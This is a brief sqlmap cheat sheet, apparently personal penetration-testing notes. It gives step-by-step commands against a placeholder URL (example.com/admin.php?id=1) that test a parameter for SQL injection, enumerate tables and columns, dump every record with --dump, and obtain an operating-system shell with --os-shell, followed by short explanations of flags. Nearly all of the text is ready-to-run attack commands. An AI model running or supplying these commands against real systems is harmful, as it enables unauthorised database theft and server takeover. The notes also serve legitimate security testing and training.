Test id parameter
sqlmap -u http://example.com/admin.php?id=1 -p "id"
Dump database
sqlmap -u http://example.com/admin.php?id=1 -p "id" --dbms=mysql --dump
Get a shell
sqlmap -u http://example.com/admin.php?id=1 -p "id" --dbms=mysql --os-shell
1. Check if parameter is injectable in this case the parameter id
sqlmap -u http://example.com/admin.php?id=1
2. If its injectable check the db banner
sqlmap -u http://example.com/admin.php?id=1 -b
3. Retrive more info. Discover db tables
sqlmap -u http://example.com/admin.php?id=1 --tables
4. Retrive all columns from a db
sqlmap -u http://example.com/admin.php?id=1 --current-db databaseName --columns
5. Retrive all the data from a db
sqlmap -u http://example.com/admin.php?id=1 --current-db databaseName --dump
# -v3 will increase the verbosity of the sqlmap and we will show as what payloads sqlmap is using
# --users will enumerate the db users
# --dbs will show what databases are connected to the application
# -D specify database
# -T specify table
# -C specify columns separeted by comma
# --technique= specify SQLi technique ex. U for union or B for boolean
# -r you can specify a file from a request intercepted with burp and use it instead of using url
# --flush-session refresh session